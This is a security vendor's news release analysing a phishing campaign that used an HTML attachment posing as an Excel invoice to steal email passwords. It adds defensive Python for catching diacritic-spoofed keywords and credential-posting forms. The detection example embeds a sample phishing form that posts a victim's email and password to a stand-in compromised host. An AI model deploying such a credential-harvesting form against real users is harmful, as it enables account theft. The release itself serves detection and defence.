Cyren Ltd.

03/18/2021 | News release | Distributed by Public on 03/19/2021 07:25

Phishing campaign masquerading as an Excel template in an HTML attachment

Phishing remains one of the most prevalent types of attack against organizations, so it is not surprising that attackers keep devising more sophisticated methods of obtaining victims' credentials and personal data.

One of the most recent phishing attacks detected by Cyren Inbox Security tried to harvest recipients' email passwords through an attached HTML page that posed as an Excel file and was titled 'Microsoft Office Center'.

The Attack

Employees of several organizations using the Cyren Inbox Security solution started receiving emails sent from automatically generated addresses, all hosted on a compromised sender domain.

The sender's display name mirrored the targeted organization, <[Company] Invoicé Repoŕt>, and the subject read 'Invoiće ID:XXXXXX is ready for paymeńt'. The phishers deliberately used accented characters (é, ć, ń) in the subject and display name so that simple keyword filters matching 'Invoice' and 'payment' would not fire on the look-alike words.
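The diacritic trick above defeats a byte-for-byte keyword match but not a filter that folds the text first. The following is an added example (not part of the original release, and not Cyren's detection logic) showing both sides: a naive match that misses the accented subject, and a check that decomposes the text with NFKD, strips combining marks and then matches, while also reporting which words collapse to plain ASCII once folded. The subject and display name are constructed samples modelled on the ones quoted above; the keyword list is an assumption.

```python
import unicodedata

# Constructed samples mimicking the campaign's subject and display name (written with
# escapes so the file is encoding-agnostic): "Invoiće ID:123456 is ready for paymeńt"
SAMPLE_SUBJECT = "Invoi\u0107e ID:123456 is ready for payme\u0144t"
# "Example Corp Invoicé Repoŕt"
SAMPLE_DISPLAY_NAME = "Example Corp Invoic\u00e9 Repo\u0155t"

# Assumed keyword list a simple invoice/payment phishing rule might use.
KEYWORDS = ("invoice", "payment")


def fold_diacritics(text):
    """Decompose to NFKD, drop combining marks (category Mn etc.), and casefold.

    'Invoiće' -> 'i','n','v','o','i','c',U+0301,'e' -> 'invoice'
    """
    decomposed = unicodedata.normalize("NFKD", text)
    stripped = "".join(ch for ch in decomposed if not unicodedata.combining(ch))
    return stripped.casefold()


def naive_keyword_hits(text, keywords=KEYWORDS):
    """The filter the phishers were evading: lower-case and substring match only."""
    lowered = text.lower()
    return [k for k in keywords if k in lowered]


def folded_keyword_hits(text, keywords=KEYWORDS):
    """Same match, but on the diacritic-folded text, so look-alike words still hit."""
    folded = fold_diacritics(text)
    return [k for k in keywords if k in folded]


def spoofed_words(text):
    """Words that differ from their folded form yet fold to pure ASCII.

    Legitimate non-English text usually keeps non-ASCII letters after folding
    (e.g. 'ß', 'ø'); an English word that only differs by a combining accent
    is a strong signal of deliberate keyword evasion.
    Returns a list of (original, folded) pairs in order of appearance.
    """
    out = []
    for word in text.split():
        folded = fold_diacritics(word)
        if folded != word.casefold() and folded.isascii():
            out.append((word, folded))
    return out


if __name__ == "__main__":
    print("naive  :", naive_keyword_hits(SAMPLE_SUBJECT))
    print("folded :", folded_keyword_hits(SAMPLE_SUBJECT))
    print("spoofed:", spoofed_words(SAMPLE_SUBJECT))
    print("display:", folded_keyword_hits(SAMPLE_DISPLAY_NAME))
```

Folding before matching is cheap, but on its own it would also fire on genuinely accented text, which is why the `spoofed_words` signal (accented word that becomes plain ASCII) is the more useful feature to feed into a score alongside the keyword hit.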

The email body was empty, but the message carried an HTML attachment posing as an .xlsx invoice whose filename included the targeted company's name, increasing the chance that the recipient would open it. Once opened, a fake login page titled 'Microsoft Office Center', rendered over an Excel-spreadsheet background, appeared with the aim of stealing the user's password.

Visually, this attack looks identical to the one described in a recent BleepingComputer article, where Morse code in the HTML attachment is used to hide the phishing URL. In this case, however, the HTML attachment relies on obfuscated JavaScript instead of Morse code, which makes its true purpose hard to determine until the script is executed.

The script contained a separate function that personalized the visuals of the phishing campaign:

The ml variable held the recipient's email address, and the logi variable inserted the targeted brand's logo image into the phishing page. The images were fetched from logo.clearbit.com, Clearbit's legitimate Logo API, which serves logos for hundreds of companies free of charge. This script not only personalizes the attack but also lets the attacker expand the pool of targeted companies simply by changing the logo variable.

The password field in the HTML attachment is what steals the credentials. It sits in an HTML form with method POST whose action URL points to a PHP script that receives everything entered into the login and password fields and forwards it to the attacker:

The action URL points at a legitimate Japanese website that the attackers abuse as the drop point for harvested credentials. The form's enctype='multipart/form-data' is the encoding normally used for file uploads: each submitted field, including the password, is sent as its own part of the POST body. It does not hide or split the data across servers; the whole login and password still travel in one request to the credential-collection endpoint.
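Once the attachment's JavaScript has been deobfuscated (or the page has been rendered in a sandbox and its DOM dumped), the personalization script and the credential form described above can be picked out statically. The following is an added example (not part of the original release, and not Cyren's detection code) that walks the HTML with the standard-library parser and reports two things: any form with a password field that POSTs to an off-page host, with its enctype and field names; and any image loaded from logo.clearbit.com, the brand-logo source the script used. The sample HTML, the hidden field named ml, the .php path and the hosts are constructed placeholders, not the ones seen in the campaign.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample standing in for the decoded attachment DOM. The hostnames,
# path and the hidden 'ml' field are assumptions for illustration only.
SAMPLE_HTML = """
<html><body>
<img src="https://logo.clearbit.com/example.com">
<form method="post" action="https://compromised.example.jp/wp-content/post.php"
      enctype="multipart/form-data">
  <input type="hidden" name="ml" value="victim@example.com">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""


class FormAuditor(HTMLParser):
    """Collects every <form> with its <input>s, plus every <img src>."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self.images = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "method": (a.get("method") or "get").lower(),
                "action": a.get("action") or "",
                # Browser default when enctype is absent.
                "enctype": (a.get("enctype") or "application/x-www-form-urlencoded").lower(),
                "inputs": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                {"type": (a.get("type") or "text").lower(), "name": a.get("name") or ""}
            )
        elif tag == "img":
            self.images.append(a.get("src") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_attachment(html):
    """Return findings for credential-posting forms and brand-logo API images."""
    parser = FormAuditor()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        has_password = any(i["type"] == "password" for i in form["inputs"])
        host = urlparse(form["action"]).hostname or ""
        # A password field POSTed to an absolute external URL is the exfil path.
        if has_password and form["method"] == "post" and host:
            findings.append({
                "kind": "credential_exfil_form",
                "host": host,
                "enctype": form["enctype"],
                "fields": [i["name"] for i in form["inputs"] if i["type"] != "submit"],
            })
    for src in parser.images:
        host = urlparse(src).hostname or ""
        if host == "logo.clearbit.com" or host.endswith(".clearbit.com"):
            findings.append({"kind": "brand_logo_api", "host": host, "src": src})
    return findings


if __name__ == "__main__":
    for finding in audit_attachment(SAMPLE_HTML):
        print(finding)
```

The host extracted from the action URL is the indicator worth blocking and reporting to the site owner; the enctype is recorded only so an analyst can see that the credentials leave as ordinary multipart fields, not as something encrypted or fragmented.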

Cyren Inbox Security Detection

With the Cyren Incident Response Service and its 24x7 support for phishing investigation, the attack was rapidly investigated and all emails related to it were classified as phishing for every targeted Cyren Inbox Security customer.